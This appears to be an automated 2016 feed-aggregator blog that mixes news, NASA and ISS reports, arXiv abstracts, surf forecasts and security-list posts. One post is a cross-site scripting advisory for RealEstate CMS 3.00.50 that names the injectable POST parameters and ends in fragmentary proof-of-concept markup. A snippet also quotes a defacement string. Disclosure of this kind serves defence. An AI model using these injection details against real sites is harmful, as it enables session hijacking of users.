Saturday, October 8, 2016

Join the Anonymous Million Mask March

This is "Join the Anonymous Million Mask March" by cyberaktivist on Vimeo, the home for high quality videos and the people who love them.

from Google Alert - anonymous http://ift.tt/2cZH5ox
via IFTTT

La bella Colomba (Anonymous)

La bella Colomba (Anonymous) ... Composer, Anonymous. Key, E-flat major. Movements/Sections, 1 movement. Librettist, unknown.

from Google Alert - anonymous http://ift.tt/2d3gEct
via IFTTT

Atheist ex-nurse forced into Alcoholics Anonymous substance abuse program

A former Vancouver nurse is claiming his rights as an atheist were violated because his employer and union forced him into Alcoholics Anonymous ...

from Google Alert - anonymous http://ift.tt/2d26OrA
via IFTTT

Yahoo Email Spying Scandal — Here's Everything that has Happened So Far

Today Yahoo! is all over the Internet, but in a way the company would never have expected. It all started days ago when Reuters cited some anonymous sources and reported that Yahoo built a secret software to scan the emails of hundreds of millions of its users at the request of a U.S. intelligence service. At this point, we were not much clear about the intelligence agency: the National


from The Hacker News http://ift.tt/2ecjZLm
via IFTTT

The Hydrogen Clouds of M33


Gorgeous spiral galaxy M33 seems to have more than its fair share of glowing hydrogen gas. A prominent member of the local group of galaxies, M33 is also known as the Triangulum Galaxy and lies about 3 million light-years distant. The galaxy's inner 30,000 light-years or so are shown in this telescopic portrait that enhances its reddish ionized hydrogen clouds or HII regions. Sprawling along loose spiral arms that wind toward the core, M33's giant HII regions are some of the largest known stellar nurseries, sites of the formation of short-lived but very massive stars. Intense ultraviolet radiation from the luminous, massive stars ionizes the surrounding hydrogen gas and ultimately produces the characteristic red glow. To enhance this image, broadband data was used to produce a color view of the galaxy and combined with narrowband data recorded through a hydrogen-alpha filter. That filter transmits the light of the strongest visible hydrogen emission line.

via NASA http://ift.tt/2d8nO2o

Friday, October 7, 2016

Ocean City, MD's surf is at least 5.18ft high

Maryland-Delaware, October 12, 2016 at 10:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 4.88ft. At 10:00 AM, surf min of 5.18ft. At 4:00 PM, surf min of 5.32ft. At 10:00 PM, surf min of 5.23ft.

Surf maximum: 6.19ft (1.89m)
Surf minimum: 5.18ft (1.58m)
Tide height: 0.64ft (0.19m)
Wind direction: NE
Wind speed: 10.61 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Fix anonymous caching incorrect increment of RewriteRule Skip

These are all directly tied to the boost .htaccess generation incorrectly doing an increment on the Anonymous Caching "skip" rewrite rule. Let's take a ...

from Google Alert - anonymous http://ift.tt/2dALI6e
via IFTTT

Blank page after anonymous form submission

Using the anonymous “add event” feature, when someone submits an event anonymously, they get a blank page. When using the same feature ...

from Google Alert - anonymous http://ift.tt/2d0lVSo
via IFTTT

Full-Text PDF

Recently, Farash et al. proposed a lightweight anonymous authentication ... service from a foreign agent, an anonymous authentication scheme is ...

from Google Alert - anonymous http://ift.tt/2d8Y3zf
via IFTTT

2017 Atlantic South Regional Convention

Date/Time Date(s) - May 05, 2017 - May 07, 2017. Location Crowne Plaza Little Rock. Categories. Regional Convention. "Spiritual Experience in the ...

from Google Alert - anonymous http://ift.tt/2dRSbaW
via IFTTT

Ravens: OT Ronnie Stanley (foot) misses third straight day of practice, says he will be a game-time decision Sunday (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

An Enhanced Lightweight Anonymous Authentication Scheme for a Scalable Localization ...

Recently, Farash et al. proposed a lightweight anonymous authentication ... sensor networks, to provide anonymous authentication of sensor nodes.

from Google Alert - anonymous http://ift.tt/2e9qoHk
via IFTTT

Create an anonymous callback function as the second argument to the service method call.

Participate in discussions with other Treehouse members and learn.

from Google Alert - anonymous http://ift.tt/2dELBX3
via IFTTT

ISS Daily Summary Report – 10/06/2016

Fluid Shifts Before, During and After Prolonged Space Flight and Their Association with Intracranial Pressure and Visual Impairment (Fluid Shifts): Following yesterday’s Dilution Measurements, today, the ISS CDR performed Day 2 of his Final Fluid Shifts collection.  With assistance from FE-6, the crew performed various collections and measurements including Optical Coherence Tomography (OCT), Distortion Product Otoacoustic Emissions (DPOAE), Tonometry, and Ultrasounds.  Today’s sessions concluded the CDR’s Fluid Shift activities, as the crew will not be performing Cerebral and Cochlear Fluid Pressure (CCFP) measurements or Chibis/Lower Body Negative Pressure (LBNP) measurements.  The CCFP measurement device was returned on SpaceX-9 for failure analysis, and due to the shortened 47S increment duration, it was determined that the LBNP would not be required.  Both instances of science loss were reviewed and accepted by the payload teams.  Fluid Shifts investigates the causes for severe and lasting physical changes to astronaut’s eyes. Because the headward fluid shift is a hypothesized contributor to these changes, reversing this fluid shift with a lower body negative pressure device is investigated as a possible intervention. Results from this study may help to develop preventative measures against lasting changes in vision and eye damage. Marrow Blood Collection: FE-5, with the assistance of FE-6, performed the fourth and final blood collections in support of the Return minus 30 day (R-30d) requirement.  The samples were spun using the on-board refrigerated centrifuge then stored in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return on a later flight.  The MARROW study (Bone Marrow Adipose Reaction: Red Or White?) (Marrow) investigation looks at the effect of microgravity on the bone marrow. 
It is believed that microgravity, like long-duration bed rest on Earth, has a negative effect on the bone marrow and the blood cells that are produced in the bone marrow. The extent of this effect, and its recovery, are of interest to space research and healthcare providers on Earth. Multiomics Collections: FE-5 performed sampling in support of the JAXA MultiOmics experiment.  Various samples are collected and stowed in MELFI four times throughout the crew’s on-orbit duration in addition to a questionnaire and ingestion of fructooligosaccharide (FOS).  The objective of MultiOmics is to understand the gut ecosystem of astronauts in the space environment, especially focusing on the immune dysfunction, and to evaluate the impact of fructooligosaccharide (FOS).  Electrostatic Levitation Furnace (ELF) Troubleshooting: FE-5 performed an ELF Sample Holder exchange to troubleshoot the friction problems seen with previous Sample Holders.  The Electrostatic Levitation Furnace (ELF) is an experimental facility designed to levitate/melt/solidify materials by containerless processing techniques using the Electrostatic Levitation method. With this facility, thermophysical properties of high temperature melts can be measured, and solidification from deeply undercooled melts can be achieved. The ELF is located in the JEM Multipurpose Small Payload Rack (MSPR) in Kibo.  Microgravity Science Laboratory (MSL) Sample Cartridge Assembly (SCA) Exchange: FE-5 performed a sample exchange in the European Space Agency’s (ESA’s) MSL facility.  The crew installed the Batch-2b of the MSL SCA, which serves two projects investigating how different phases organize in a structure when metallic alloys are solidified. The crew observed a scratch on the liquid-metal ring, which allows for controlled cooling of the sample.  Ground controllers had the crew continue with the operations, and they will initiate the experiment run the week of 17 October.  
The project Metastable Solidification of Composites (METCOMP) studies the phase formed by the reaction of the remaining liquid phase with an already formed solid, to form a second solid phase on cooling. For this purpose, Bronze (Copper-Tin Alloys) of different compositions will be processed. The other project, Solidification along a Eutectic path in Ternary Alloys (SETA), looks at how two phases that form together organize into lamellar, or fibre, structures when cooling Aluminum (Copper-Silver Alloys). Both projects will provide benchmark samples that will enable to test numerical models that aim to predict these structures. Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Slosh Preparations: FE-6 continued charging batteries and review On-Board Training (OBT) materials in advance of tomorrow’s experiment run.  The crew conducted a conference with the SPHERES-Slosh team. The SPHERES-Slosh investigation examines the way liquids move inside containers in a microgravity environment. The phenomena and mechanics associated with such liquid movement are still not well understood and are very different than our common experiences with a cup of coffee on Earth. Rockets deliver satellites to space using liquid fuels as a power source, and this investigation plans to improve our understanding of how propellants within rockets behave in order to increase the safety and efficiency of future vehicle designs.  Today’s Planned Activities All activities were completed unless otherwise noted. 
CSA Generic Frozen Blood Collection CSA Generic Refrigerated Centrifuge Configure ENERGY Diet Log of Breakfast SPHERES Battery Swap CSA Generic Sample MELFI Insertion Multi-purpose Small Payload Rack (MSPR) /Group Combustion Module (GCM) Component Activation 2 Download of BRI log from RSS1 Video Recording of Greetings Regenerative Environmental Control and Life Support System (RGN) WSTA Fill In Flight Maintenance (IFM) Waste and Hygiene Compartment (WHC) Full Fill SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) Hard Drive Health Maintenance System (HMS) Food Frequency Questionnaire (FFQ) FLUID SHIFTS. Ultrasound 2 Power On In Flight Maintenance (IFM) Waste and Hygiene Compartment (WHC) Full Fill FLUID SHIFTS. OCT Setup FLUID SHIFTS. Donning CardioLab Holter SPHERES Payload OBT FLUID SHIFTS. Baseline Ultrasound Scan SPHERES Battery Swap SPHERES Slosh OBT Fluid Shifts Ultrasound Baseline Scan Multi Omics Fecal Sample Operations Multi Omics Fecal Sample MELFI Insertion XF305 Camcorder Setup Electrostatic Levitation Furnace(ELF) Sample Holder Install ISS N2 Repress from Progress 432 [AO] СрПК Section 2 (start) Verification of Kit #1contents for Komparus Fluid Shifts OCT Baseline Exam – Operator FLUID SHIFTS. Assisted Test, Subject FLUID SHIFTS. OCT Equipment Stowage SPHERES Battery Swap ISS N2 Repress from Progress 432 [AO] СрПК Section 2 (end) SPHERES Crew Conference ENERGY Diet Log of Lunch FLUID SHIFTS. Distortion Product Otoacoustic Emission (DPOAE) Baseline Test, Subject Fluid Shifts Tonometry Baseline Setup MELFI Ice Brick Insert Fluid Shifts Tonometry Baseline […]

from ISS On-Orbit Status Report http://ift.tt/2dEv1GM
via IFTTT

London Police Arrest Romanian ATM Hacker Who Stole Millions

A Romanian man has been arrested and charged with conspiracy relating to his involvement in a prolific ATM malware campaign. Emanual Leahu, 30, was arrested in the western city of Bacău, Romania by the London Regional Fraud Team (LRFT) London police run by the City of London Police on Tuesday 20 September, extradited to the United Kingdom last week. Leahu is believed to be a member of a


from The Hacker News http://ift.tt/2dQLZAf
via IFTTT

Ocean City, MD's surf is at least 5.01ft high

Maryland-Delaware, October 10, 2016 at 10:00PM

Ocean City, MD Summary
At 4:00 AM, surf min of 3.37ft. At 10:00 AM, surf min of 3.91ft. At 4:00 PM, surf min of 4.27ft. At 10:00 PM, surf min of 5.01ft.

Surf maximum: 5.61ft (1.71m)
Surf minimum: 5.01ft (1.53m)
Tide height: 0.91ft (0.28m)
Wind direction: ENE
Wind speed: 15.2 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Verizon wants $1 Billion Discount on Yahoo Acquisition Deal after Recent Scandals

It seems like it is not all over for Yahoo yet. Another day, another bad news for Yahoo! Verizon, which has agreed to purchase Yahoo for $4.8 Billion, is now asking for a $1 Billion discount, according to recent reports. The request comes after Verizon Communications learned about the recent disclosures about hacking and spying in past few weeks. Just two weeks ago, Yahoo


from The Hacker News http://ift.tt/2e7W5Rd
via IFTTT

[FD] NEW VMSA-2016-0015 - VMware Horizon View updates address directory traversal vulnerability



Source: Gmail -> IFTTT-> Blogger

GPM Monitors Hurricane Matthew Nearing Florida

NASA's Global Precipitation Measurement mission or GPM core observatory satellite flew over Hurricane Matthew several times as the category 4 storm headed toward Florida. The GPM Core Observatory carries two instruments that show the location and intensity of rain and snow, which defines a crucial part of the storm structure - and how it will behave. The GPM Microwave Imager sees through the tops of clouds to observe how much and where precipitation occurs, and the Dual-frequency Precipitation Radar observes precise details of precipitation in 3-dimensions. GPM data is part of the toolbox of satellite data used by forecasters and scientists to understand how storms behave. GPM is a joint mission between NASA and the Japan Aerospace Exploration Agency. Current and future data sets are available with free registration to users from NASA Goddard's Precipitation Processing Center website.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2diWzzZ
via IFTTT

GPM Captures Hurricane Matthew Over Haiti

On October 2nd and 3rd, 2016 NASA's Global Precipitation Measurement mission or GPM core observatory satellite flew over Hurricane Matthew. The first pass shows Matthew immediately after it became a category 4 hurricane with sustained winds of 150 mph on October 2nd, 2016. The second pass shows it over Haiti on October 3rd as it buffets Haiti with sustained winds of 140 mph. The GPM Core Observatory carries two instruments that show the location and intensity of rain and snow, which defines a crucial part of the storm structure - and how it will behave. The GPM Microwave Imager sees through the tops of clouds to observe how much and where precipitation occurs, and the Dual-frequency Precipitation Radar observes precise details of precipitation in 3-dimensions. GPM data is part of the toolbox of satellite data used by forecasters and scientists to understand how storms behave. GPM is a joint mission between NASA and the Japan Aerospace Exploration Agency. Current and future data sets are available with free registration to users from NASA Goddard's Precipitation Processing Center website.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2dJewuV
via IFTTT

Thursday, October 6, 2016

Anonymous users are not restricted when roles are set

When enabling page access and selecting "Authenticated user" an anonymous user can still access the page.

from Google Alert - anonymous http://ift.tt/2d7n51J
via IFTTT

HaCkEd By Anonymous Ghost Gaza

The problem that I see is character problems an accents and special characters and [</title><h1>HaCkEd By Anonymous Ghost Gaza</title>.

from Google Alert - anonymous http://ift.tt/2dyM6Cc
via IFTTT

Human Decision-Making under Limited Time. (arXiv:1610.01698v1 [stat.ML])

Subjective expected utility theory assumes that decision-makers possess unlimited computational resources to reason about their choices; however, virtually all decisions in everyday life are made under resource constraints - i.e. decision-makers are bounded in their rationality. Here we experimentally tested the predictions made by a formalization of bounded rationality based on ideas from statistical mechanics and information-theory. We systematically tested human subjects in their ability to solve combinatorial puzzles under different time limitations. We found that our bounded-rational model accounts well for the data. The decomposition of the fitted model parameter into the subjects' expected utility function and resource parameter provide interesting insight into the subjects' information capacity limits. Our results confirm that humans gradually fall back on their learned prior choice patterns when confronted with increasing resource limitations.



from cs.AI updates on arXiv.org http://ift.tt/2dIQRLh
via IFTTT

Parallel Large-Scale Attribute Reduction on Cloud Systems. (arXiv:1610.01807v1 [cs.DC])

The rapid growth of emerging information technologies and application patterns in modern society, e.g., Internet, Internet of Things, Cloud Computing and Tri-network Convergence, has caused the advent of the era of big data. Big data contains huge values, however, mining knowledge from big data is a tremendously challenging task because of data uncertainty and inconsistency. Attribute reduction (also known as feature selection) can not only be used as an effective preprocessing step, but also exploits the data redundancy to reduce the uncertainty. However, existing solutions are designed 1) either for a single machine that means the entire data must fit in the main memory and the parallelism is limited; 2) or for the Hadoop platform which means that the data have to be loaded into the distributed memory frequently and therefore become inefficient. In this paper, we overcome these shortcomings for maximum efficiency possible, and propose a unified framework for Parallel Large-scale Attribute Reduction, termed PLAR, for big data analysis. PLAR consists of three components: 1) Granular Computing (GrC)-based initialization: it converts a decision table (i.e., original data representation) into a granularity representation which reduces the amount of space and hence can be easily cached in the distributed memory: 2) model-parallelism: it simultaneously evaluates all feature candidates and makes attribute reduction highly parallelizable; 3) data-parallelism: it computes the significance of an attribute in parallel using a MapReduce-style manner. We implement PLAR with four representative heuristic feature selection algorithms on Spark, and evaluate them on various huge datasets, including UCI and astronomical datasets, finding our method's advantages beyond existing solutions.



from cs.AI updates on arXiv.org http://ift.tt/2cXPbsN
via IFTTT

A New Data Representation Based on Training Data Characteristics to Extract Drug Named-Entity in Medical Text. (arXiv:1610.01891v1 [cs.CL])

One essential task in information extraction from the medical corpus is drug name recognition. Compared with text sources come from other domains, the medical text is special and has unique characteristics. In addition, the medical text mining poses more challenges, e.g., more unstructured text, the fast growing of new terms addition, a wide range of name variation for the same drug. The mining is even more challenging due to the lack of labeled dataset sources and external knowledge, as well as multiple token representations for a single drug name that is more common in the real application setting. Although many approaches have been proposed to overwhelm the task, some problems remained with poor F-score performance (less than 0.75). This paper presents a new treatment in data representation techniques to overcome some of those challenges. We propose three data representation techniques based on the characteristics of word distribution and word similarities as a result of word embedding training. The first technique is evaluated with the standard NN model, i.e., MLP (Multi-Layer Perceptrons). The second technique involves two deep network classifiers, i.e., DBN (Deep Belief Networks), and SAE (Stacked Denoising Encoders). The third technique represents the sentence as a sequence that is evaluated with a recurrent NN model, i.e., LSTM (Long Short Term Memory). In extracting the drug name entities, the third technique gives the best F-score performance compared to the state of the art, with its average F-score being 0.8645.



from cs.AI updates on arXiv.org http://ift.tt/2dQfAyZ
via IFTTT

Adaptive Online Sequential ELM for Concept Drift Tackling. (arXiv:1610.01922v1 [cs.AI])

A machine learning method needs to adapt to over time changes in the environment. Such changes are known as concept drift. In this paper, we propose concept drift tackling method as an enhancement of Online Sequential Extreme Learning Machine (OS-ELM) and Constructive Enhancement OS-ELM (CEOS-ELM) by adding adaptive capability for classification and regression problem. The scheme is named as adaptive OS-ELM (AOS-ELM). It is a single classifier scheme that works well to handle real drift, virtual drift, and hybrid drift. The AOS-ELM also works well for sudden drift and recurrent context change type. The scheme is a simple unified method implemented in simple lines of code. We evaluated AOS-ELM on regression and classification problem by using concept drift public data set (SEA and STAGGER) and other public data sets such as MNIST, USPS, and IDS. Experiments show that our method gives higher kappa value compared to the multiclassifier ELM ensemble. Even though AOS-ELM in practice does not need hidden nodes increase, we address some issues related to the increasing of the hidden nodes such as error condition and rank values. We propose taking the rank of the pseudoinverse matrix as an indicator parameter to detect underfitting condition.



from cs.AI updates on arXiv.org http://ift.tt/2cXOuja
via IFTTT

Metaheuristic Algorithms for Convolution Neural Network. (arXiv:1610.01925v1 [cs.CV])

A typical modern optimization technique is usually either heuristic or metaheuristic. This technique has managed to solve some optimization problems in the research area of science, engineering, and industry. However, implementation strategy of metaheuristic for accuracy improvement on convolution neural networks (CNN), a famous deep learning method, is still rarely investigated. Deep learning relates to a type of machine learning technique, where its aim is to move closer to the goal of artificial intelligence of creating a machine that could successfully perform any intellectual tasks that can be carried out by a human. In this paper, we propose the implementation strategy of three popular metaheuristic approaches, that is, simulated annealing, differential evolution, and harmony search, to optimize CNN. The performances of these metaheuristic methods in optimizing CNN on classifying MNIST and CIFAR dataset were evaluated and compared. Furthermore, the proposed methods are also compared with the original CNN. Although the proposed methods show an increase in the computation time, their accuracy has also been improved (up to 7.14 percent).



from cs.AI updates on arXiv.org http://ift.tt/2dQfFCG
via IFTTT

The backtracking survey propagation algorithm for solving random K-SAT problems. (arXiv:1508.05117v4 [cs.CC] UPDATED)

Discrete combinatorial optimization has a central role in many scientific disciplines, however, for hard problems we lack linear time algorithms that would allow us to solve very large instances. Moreover, it is still unclear what are the key features that make a discrete combinatorial optimization problem hard to solve. Here we study random K-satisfiability problems with $K=3,4$, which are known to be very hard close to the SAT-UNSAT threshold, where problems stop having solutions. We show that the backtracking survey propagation algorithm, in a time practically linear in the problem size, is able to find solutions very close to the threshold, in a region unreachable by any other algorithm. All solutions found have no frozen variables, thus supporting the conjecture that only unfrozen solutions can be found in linear time, and that a problem becomes impossible to solve in linear time when all solutions contain frozen variables.



from cs.AI updates on arXiv.org http://ift.tt/1I5Y6A4
via IFTTT

A Discrete and Bounded Envy-Free Cake Cutting Protocol for Any Number of Agents. (arXiv:1604.03655v10 [cs.DS] UPDATED)

We consider the well-studied cake cutting problem in which the goal is to find an envy-free allocation based on queries from $n$ agents. The problem has received attention in computer science, mathematics, and economics. It has been a major open problem whether there exists a discrete and bounded envy-free protocol. We resolve the problem by proposing a discrete and bounded envy-free protocol for any number of agents. The maximum number of queries required by the protocol is $n^{n^{n^{n^{n^n}}}}$. We additionally show that even if we do not run our protocol to completion, it can find in at most $n^{n+1}$ queries a partial allocation of the cake that achieves proportionality (each agent gets at least $1/n$ of the value of the whole cake) and envy-freeness. Finally we show that an envy-free partial allocation can be computed in $n^{n+1}$ queries such that each agent gets a connected piece that gives the agent at least $1/(3n)$ of the value of the whole cake.



from cs.AI updates on arXiv.org http://ift.tt/1Q85mzr
via IFTTT

Extending Unification in $\mathcal{EL}$ to Disunification: The Case of Dismatching and Local Disunification. (arXiv:1609.05621v2 [cs.LO] UPDATED)

Unification in Description Logics has been introduced as a means to detect redundancies in ontologies. We try to extend the known decidability results for unification in the Description Logic $\mathcal{EL}$ to disunification since negative constraints can be used to avoid unwanted unifiers. While decidability of the solvability of general $\mathcal{EL}$-disunification problems remains an open problem, we obtain NP-completeness results for two interesting special cases: dismatching problems, where one side of each negative constraint must be ground, and local solvability of disunification problems, where we consider only solutions that are constructed from terms occurring in the input problem. More precisely, we first show that dismatching can be reduced to local disunification, and then provide two complementary NP-algorithms for finding local solutions of disunification problems.



from cs.AI updates on arXiv.org http://ift.tt/2cMi0u7
via IFTTT

MLB: Man who threw beer at Orioles OF Hyun Soo Kim in AL wild-card game charged with mischief, due in court in November (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Ali Campbell
Husband / Dad / Youth & Children's Ministry Consultant / Leadership / Mission / Discipleship / @ali_theresource / Read / Write / Draw / Politics || Views Mine
Mid Sussex
https://t.co/Qz9YP0FDxK
Following: 2550 - Followers: 3546

October 06, 2016 at 06:43PM via Twitter http://twitter.com/AliCampbell_68

Orioles: Pitching coach Dave Wallace, 69, retiring after 3 years with Baltimore and 36 in coaching; worked for 7 teams (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] [KIS-2016-12] Magento <= 1.9.2.2 (RSS Feed) Information Disclosure Vulnerability

Source: Gmail -> IFTTT-> Blogger

Parent/child form for anonymous users

This is a follow up to an existing post. It is closed so I can't respond. http://ift.tt/2dOtdZZanonymous-users/.

from Google Alert - anonymous http://ift.tt/2d6ySx1
via IFTTT

Mac Malware Can Secretly Spy On Your Webcam and Mic – Get This Free Tool to Stay Safe

Apple Mac Computers are considered to be much safer than Windows at keeping viruses and malware out of its environment, but that’s simply not true anymore. It's not because Mac OS X is getting worse every day, but because hackers are getting smart and sophisticated these days. The bad news for Mac users is that malware targeting webcams and microphones has now come up for Mac laptops as well


from The Hacker News http://ift.tt/2dvvkri
via IFTTT

What The Anonymous Visitor Is Telling You: How to Engage the 95% that Don't Convert

95% of anonymous website visitors remain just that - anonymous; they don't convert. The focus of online marketing is on the 5% that do, with the hope ...

from Google Alert - anonymous http://ift.tt/2e5Qj2s
via IFTTT

ISS Daily Summary Report – 10/05/2016

ENERGY (Astronaut’s Energy Requirement for Long-Term Space Flight): Today, FE-5 completed Day 7 of the 11 day ENERGY experiment. In addition to today’s water and urine samples, the 11 day ENERGY experiment requires FE-5 to continue logging his dietary intake and wear the armband that monitors his activities. The Energy investigation measures an Astronaut’s Energy Requirements for Long-Term Space Flight, a crucial factor needed for sending the correct amount of the right types of food with space crews. Astronauts often lose body mass with extended stays in space for reasons that remain unclear, although increased exercise as a microgravity countermeasure may be a factor. Knowing details of astronaut metabolism and activity, combined with other conditions, will help ensure that crews are properly nourished on long missions.

Fluid Shifts: Today, the crew completed Fluid Shifts operations by configuring the Refrigerated Centrifuge for sample load operations, conducting body (blood, urine, and saliva) sample collections and stowing the samples into a Box Module within a MELFI (Minus Eighty-degree Freezer for ISS) Rack. The crew also collected a galley water sample and stowed it in the MELFI prior to ingestion of a Tracer solution from the Tracer Syringe. Fluid Shifts is a joint USOS-Russian experiment that measures how much fluid shifts from the lower body to the upper body, in or out of cells and blood vessels, and determines the impact these shifts have on fluid pressure in the head, changes in vision and eye structures.

Vascular Echo Resting Ultrasound Scan and Blood Pressure Operations: With support from the Vascular Echo ground team, FE-5 installed the Ultrasound 2 probe and ECG Cable, configured the Ultrasound 2 software and the VOX, attached the ECG Electrodes, marked the arteries, and performed the ultrasound scans. The crew also performed 3 consecutive blood pressure measurements using the Cardiolab (CDL) Holter Arterial Blood Pressure (BP) Unit. This Canadian Space Agency (CSA) investigation examines changes in blood vessels and the heart while the crew members are in space, and then follows their recovery on return to Earth. The results could provide insight into potential countermeasures to help maintain crew member health, and quality of life for everyone.

Thermolab Instrumentation for Circadian Rhythms: Today, FE-5 began the first of a three day European Space Agency (ESA) Circadian Rhythms experiment by donning the Thermolab Double sensors which are to be worn for 36 hours. After the measurement was complete, the data was transferred and the hardware was stowed. The objective of the experiment is to get a better understanding of any alterations in circadian rhythms in humans during long-term space flights. Such knowledge will not only provide important insights into the adaptations of the human autonomic nervous system in space over time, but also has significant practical implications by helping to improve physical exercise, rest and work shifts as well as fostering adequate workplace illumination in the sense of occupational healthcare in future space missions.

At Home in Space Questionnaire: FE-6 completed a questionnaire for the At Home in Space investigation. This Canadian Space Agency (CSA) experiment assesses culture, values, and psychosocial adaptation of astronauts to a space environment shared by multinational crews on long-duration missions. It is hypothesized that astronauts develop a shared space culture that is an adaptive strategy for handling cultural differences and that they deal with the isolated confined environment of the spacecraft by creating a home in space. At Home in Space uses a questionnaire battery to investigate individual and culturally related differences, family functioning, values, coping with stress, and post-experience growth.

Oxygen Generation System (OGS) Inter-Module Ventilation (IMV) Flow Measurements: This morning the crew performed an activity to remove the Kapton Tape shim from the Velocicalc probe and added Kapton tape shims to the OGS Velocicalc Adapter. It was found in the last use of the adapter that the shim added to the probe resulted in interference when trying to use adapters other than the OGS Velocicalc Adapter. Following this modification, the crew took two measurements of the OGS Cabin Air Inlet. One measurement utilized the OGS Velocicalc Adapter, while the other did not. These readings will be used to compare against each other and calibrate the ground team to previous readings that have been taken at this location.

Cygnus Capture Self Study: FE-5 and FE-6 used Robotic Onboard Trainer (ROBoT) to simulate Cygnus 2 meter approaches, 30 meter approach and Capture Point (CP) Hold.

Crew Quarters (CQ) Solid State Lighting Assembly (SSLA) Installation: Today, FE-6 installed a SSLA into the Starboard CQ. The SSLAs were designed to replace General Luminaire Assemblies (GLAs) to improve visual acuity and to provide a crew health countermeasure for circadian rhythms, sleep, alertness and performance. To accomplish these goals, SSLAs are designed to operate in 3 modes with 3 distinct spectra. The different spectra provide control of the blue portion of the light, which impacts melatonin production in humans, which in turn impacts sleep.

Today’s Planned Activities
All activities were completed unless otherwise noted.

FLUID SHIFTS. Saliva Test, Subject
FLUID SHIFTS. MELFI Urine Sample Insertion
FLUID SHIFTS. Urine Collection, Subject
FLUID SHIFTS. Basic blood collection, Subject
Fluid Shifts Blood Collection – Operator
FLUID SHIFTS. Water Collection from the Galley and taking radioisotope marker, Subject
Fluid Shifts Refrigerated Centrifuge Configuration
ENERGY Diet Log of Breakfast
Tropical Cyclone Hardware Closeout
FLUID SHIFTS. Conclude Centrifuge Spin
SPHERES Battery Setup
Fine Motor Skills Experiment Test – Subject
ISS CREW/SSIPC CONFERENCE
At Home In Space Questionnaire
Environmental Health System (EHS) Acoustic Dosimeters – Data Transfer and Stow
ENERGY Water Sample
FLUID SHIFTS. Urine Collection, Subject
Energy Urine Sample Collection
FLUID SHIFTS. MELFI Urine Sample Insertion
SPHERES Battery Swap
FLUID SHIFTS. 3-Hour Blood Collection, Subject
Fluid Shifts Refrigerated Centrifuge Configuration
FLUID SHIFTS. 3-hour Saliva Collection, Subject
FLUID SHIFTS. MELFI Urine Sample Insertion
Science Box Locker Prep
FLUID SHIFTS. Conclude Centrifuge Spin
FLUID SHIFTS. MELFI Urine Sample Insertion
FLUID SHIFTS Blood Collection
Ultrasound 2 HRF Rack 1 Power On
Vascular Echo Leg Cuffs Ultrasound Scan 1
Public Affairs Office (PAO) High Definition (HD) Config JEM Setup
Oxygen […]

from ISS On-Orbit Status Report http://ift.tt/2dOsb5u
via IFTTT

[FD] RealEstate CMS 3.00.50 - Cross Site Scripting Vulnerability

Document Title:
===============
RealEstate CMS 3.00.50 - Cross Site Scripting Vulnerability

References (Source):
====================
http://ift.tt/2dMuqkr

Release Date:
=============
2016-10-06

Vulnerability Laboratory ID (VL-ID):
====================================
1949

Common Vulnerability Scoring System:
====================================
3

Product & Service Introduction:
===============================
RealEstate CMS is a web portal script designed for realty agents, realtor or brokers to sell, buy, trade, rent and letting their client's property through online. It is a web based Content Management System integrated web application platform developed in php, mysql used by real estate companies to promote properties. Feature-rich, SEO-friendly, easy to use interface with Protected admin area to create.

(Copy of the Vendor Homepage: http://ift.tt/1Hd4syR )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a cross site scripting vulnerability in the official RealEstate v3.00.50 content management system.

Vulnerability Disclosure Timeline:
==================================
2016-10-06: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Realestate v3.00.50 content management system. The vulnerability allows remote attackers to inject their own malicious script code on the client-side of the vulnerable module or service.

A client-side cross site scripting web vulnerability is located in the search engine. The web vulnerability could allow an attacker to execute javascript in the web-browser of the user or administrator to compromise session credentials. The injection point of the vulnerability is in the `Add` function with the `property_name`, `property_price` and `post_code` parameters. The execution point occurs in the search module of the content management system. The request method to inject is POST and the attack vector of the issue is located on the client-side of the web-application.

The security risk of the web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.1. Exploitation of the client-side vulnerability requires no privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in non-persistent phishing, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Add (Input)

Vulnerable Parameter(s):
[+] property_name
[+] post_code
[+] property_price

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged user account and with low or medium user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

PoC: Source
>" class="form-control">
>" class="form-control"/>
"},

Source: Gmail -> IFTTT-> Blogger

How to Start Secret Conversations on Facebook Messenger

If you are looking for ways to start a secret conversation on Facebook Messenger with your friends, then you are at the right place. In this article, I am going to tell you about Facebook Messenger's new end-to-end encrypted chat feature, dubbed "Secret Conversations," but before that, know why do you need your chats to be end-to-end encrypted? Your online privacy is under threat not only from


from The Hacker News http://ift.tt/2dNNhBi
via IFTTT

A Crumbling Layered Butte on Mars


What is this unusual mound on Mars? NASA's Curiosity rover rolling across Mars has come across a group of these mounds that NASA has labelled Murray Buttes. Pictured is a recently assembled mosaic image of one of the last of the buttes passed by Curiosity on its way up Mt. Sharp -- but also one of the most visually spectacular. Ancient water-deposited layers in relatively dense -- but now dried-out and crumbling -- windblown sandstone tops the 15-meter tall structure. The rim of Gale crater is visible in the distance. Curiosity continues to accumulate clues about how Mars changed from a planet with areas wet and hospitable to microbial life to the dry, barren, rusted landscape seen today. via NASA http://ift.tt/2cSWFNv

GPM Captures Hurricane Matthew Before Haiti Landfall

